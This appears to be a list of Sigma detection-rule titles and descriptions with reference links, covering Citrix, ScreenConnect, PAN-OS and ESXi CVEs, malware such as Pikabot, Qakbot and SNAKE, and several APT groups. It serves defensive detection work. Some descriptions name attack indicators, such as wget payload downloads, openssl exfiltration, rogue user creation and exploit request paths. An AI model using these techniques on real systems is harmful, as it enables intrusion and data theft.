CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string. https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs. https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs. https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string. https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
Potential Exploitation Attempt Of Undocumented WindowsServer RCE Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE) https://github.com/SigmaHQ/sigma/pull/3946, https://twitter.com/hackerfantastic/status/1616455335203438592?s=20
Potential SocGholish Second Stage C2 DNS Query Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations, https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations, https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update
Potential COLDSTEEL RAT File Indicators Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
Potential COLDSTEEL Persistence Service DLL Creation Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
Potential COLDSTEEL Persistence Service DLL Load Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
COLDSTEEL RAT Anonymous User Process Execution Detects the creation of a process executing as a user called "ANONYMOUS", as seen used by the "MileStone2016" variant of COLDSTEEL. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
COLDSTEEL RAT Cleanup Command Execution Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
COLDSTEEL RAT Service Persistence Execution Detects the creation of an "svchost" process with specific command line flags that were seen used by ColdSteel RAT. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
Potential COLDSTEEL RAT Windows User Creation Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
COLDSTEEL Persistence Service Creation Detects the creation of new services potentially related to COLDSTEEL RAT https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
DarkGate - Autoit3.EXE File Creation By Uncommon Process Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes constitute non-standard and suspicious ways to retrieve the Autoit3 executable. https://github.security.telekom.com/2023/08/darkgate-loader.html, https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware, https://github.com/pr0xylife/DarkGate/tree/main
DarkGate - Autoit3.EXE Execution Parameters Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. https://github.security.telekom.com/2023/08/darkgate-loader.html, https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware, https://github.com/pr0xylife/DarkGate/tree/main
DarkGate - User Created Via Net.EXE Detects creation of local users via the net.exe command with the name of "DarkGate" Internal Research
Griffon Malware Attack Pattern Detects process execution patterns related to Griffon malware as reported by Kaspersky https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
Injected Browser Process Spawning Rundll32 - GuLoader Activity Detects the execution of installed GuLoader malware on the host. GuLoader initiates network connections via the rundll32.exe process, which is spawned by an injected browser parent process. Internal Research
IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 Detects RunDLL32.exe executing a single-digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour has often been seen used by malware, especially IcedID. https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
Potential Pikabot C2 Activity Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries. https://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44, https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt
Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads: "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "Rundll32" is used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files. https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt
Potential Pikabot Discovery Activity Detects system discovery activity carried out by Pikabot, including network, user and domain group information. The malware Pikabot has been seen to use this technique as part of its C2 botnet registration with a short collection time frame (less than 1 minute). https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242, https://tria.ge/231023-lpw85she57/behavioral2
Potential Pikabot Hollowing Activity Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62, https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt
Pikabot Fake DLL Extension Execution Via Rundll32.EXE Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity. https://github.com/pr0xylife/Pikabot, https://tria.ge/231004-tp8k6sch9t/behavioral2, https://www.virustotal.com/gui/file/56db0c4842a63234ab7fe2dda6eeb63aa7bb68f9a456985b519122f74dea37e2/behavior, https://tria.ge/231212-r1bpgaefar/behavioral2
Qakbot Regsvr32 Calc Pattern Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot https://github.com/pr0xylife/Qakbot/
Potential Qakbot Rundll32 Execution Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. https://github.com/pr0xylife/Qakbot/
Qakbot Rundll32 Exports Execution Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. https://github.com/pr0xylife/Qakbot/
Qakbot Rundll32 Fake DLL Extension Execution Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. https://github.com/pr0xylife/Qakbot/
Qakbot Uninstaller Execution Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources, https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community, https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community
Rhadamanthys Stealer Module Launch Via Rundll32.EXE Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88, https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/, https://www.joesandbox.com/analysis/790122/0/html, https://twitter.com/anfam17/status/1607477672057208835
Rorschach Ransomware Execution Activity Detects Rorschach ransomware execution activity https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/
SNAKE Malware Kernel Driver File Indicator Detects SNAKE malware kernel driver file indicator https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
SNAKE Malware WerFault Persistence File Creation Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
SNAKE Malware Installer Name Indicators Detects filename indicators associated with the SNAKE malware as reported by CISA in their report https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Potential SNAKE Malware Installation CLI Arguments Indicator Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Potential SNAKE Malware Installation Binary Indicator Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Potential SNAKE Malware Persistence Service Execution Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
SNAKE Malware Covert Store Registry Key Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Potential Encrypted Registry Blob Related To SNAKE Malware Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
SNAKE Malware Service Persistence Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Ursnif Redirection Of Discovery Commands Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware. Internal Research
Potential Compromised 3CXDesktopApp Beaconing Activity - DNS Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
Malicious DLL Load By Compromised 3CXDesktopApp Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
Potential Compromised 3CXDesktopApp Execution Detects execution of known compromised version of 3CXDesktopApp https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
Potential Suspicious Child Process Of 3CXDesktopApp Detects potential suspicious child processes of "3CXDesktopApp.exe", which could be related to the 3CXDesktopApp supply chain compromise https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/, https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/
Potential Compromised 3CXDesktopApp Update Activity Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/, https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats
Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
DLL Names Used By SVR For GraphicalProton Backdoor Hunts known SVR-specific DLL names. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Potential Compromised 3CXDesktopApp ICO C2 File Download Detects potential malicious .ICO files download from a compromised 3CXDesktopApp via web requests to the malicious Github repository https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/, https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor Hunts for known SVR-specific scheduled task names https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler Hunts for known SVR-specific scheduled task names https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Diamond Sleet APT DNS Communication Indicators Detects DNS queries related to Diamond Sleet APT activity https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT File Creation Indicators Detects file creation activity that is related to Diamond Sleet APT activity https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT DLL Sideloading Indicators Detects DLL sideloading activity seen used by Diamond Sleet APT https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT Process Activity Indicators Detects process creation activity indicators related to Diamond Sleet APT https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT Scheduled Task Creation - Registry Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of the TeamCity CVE-2023-42793 vulnerability https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT Scheduled Task Creation Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of the TeamCity CVE-2023-42793 vulnerability https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Potential Operation Triangulation C2 Beaconing Activity - DNS Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB https://securelist.com/operation-triangulation/109842/, https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp
Potential Operation Triangulation C2 Beaconing Activity - Proxy Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB https://securelist.com/operation-triangulation/109842/, https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp
Potential APT FIN7 Related PowerShell Script Created Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential APT FIN7 POWERHOLD Execution Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential POWERTRASH Script Execution Detects potential execution of the PowerShell script POWERTRASH https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
Lace Tempest File Indicators Detects PowerShell script file creation with specific names or suffixes which were seen being used often in PowerShell scripts by FIN7 https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lace Tempest PowerShell Evidence Eraser Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lace Tempest PowerShell Launcher Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lace Tempest Cobalt Strike Download Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lace Tempest Malware Loader Execution Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lazarus APT DLL Sideloading Activity Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/, https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/
Mint Sandstorm - AsperaFaspex Suspicious Process Execution Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
Mint Sandstorm - Log4J Wstomcat Process Execution Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
Mint Sandstorm - ManageEngine Suspicious Process Execution Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
Potential APT Mustang Panda Activity Against Australian Gov Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
Okta 2023 Breach Indicator Of Compromise Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach. This rule can be enhanced by filtering out known and legitimate usernames used in your environment. https://www.beyondtrust.com/blog/entry/okta-support-unit-breach, https://developer.okta.com/docs/reference/api/event-types/
Onyx Sleet APT File Creation Indicators Detects file creation activity that is related to Onyx Sleet APT activity https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
PaperCut MF/NG Exploitation Related Indicators Detects exploitation indicators related to PaperCut MF/NG Exploitation https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software, https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
PaperCut MF/NG Potential Exploitation Detects suspicious child processes of "pc-app.exe", which could indicate potential exploitation of PaperCut https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software, https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml
Peach Sandstorm APT Process Activity Indicators Detects process creation activity related to Peach Sandstorm APT https://twitter.com/MsftSecIntel/status/1737895710169628824, https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details
Potential Peach Sandstorm APT C2 Communication Activity Detects potential C2 communication activity related to Peach Sandstorm APT https://twitter.com/MsftSecIntel/status/1737895710169628824, https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details
UNC4841 - Email Exfiltration File Pattern Detects filename pattern of email related data used by UNC4841 for staging and exfiltration https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - Barracuda ESG Exploitation Indicators Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation. https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - SSL Certificate Exfiltration Via Openssl Detects the execution of "openssl" to connect to an IP address. This technique was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command. https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - Download Compressed Files From Temp.sh Using Wget Detects execution of "wget" to download ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation. https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - Download Tar File From Untrusted Direct IP Via Wget Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation. https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - Potential SEASPY Execution Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection Detects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster. It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value with an uncommon character. https://github.com/RhinoSecurityLabs/CVEs/blob/15cf4d86c83daa57b59eaa2542a0ed47ad3dc32d/CVE-2024-1212/CVE-2024-1212.py, https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log successful Windows Event ID 4663 events and a SACL set on the directory. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1708, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
ScreenConnect User Database Modification Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass, https://www.cve.org/CVERecord?id=CVE-2024-1709
ScreenConnect User Database Modification - Security This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. This requires an Advanced Auditing policy to log successful Windows Event ID 4663 events and a SACL set on the directory. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094. https://github.com/amlweems/xzbot?tab=readme-ov-file#backdoor-demo
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function. https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/, https://nvd.nist.gov/vuln/detail/CVE-2024-3400
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection. https://security.paloaltonetworks.com/CVE-2024-3400, https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/, https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group Detects execution of the "net.exe" command in order to add a group named "ESX Admins". This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/
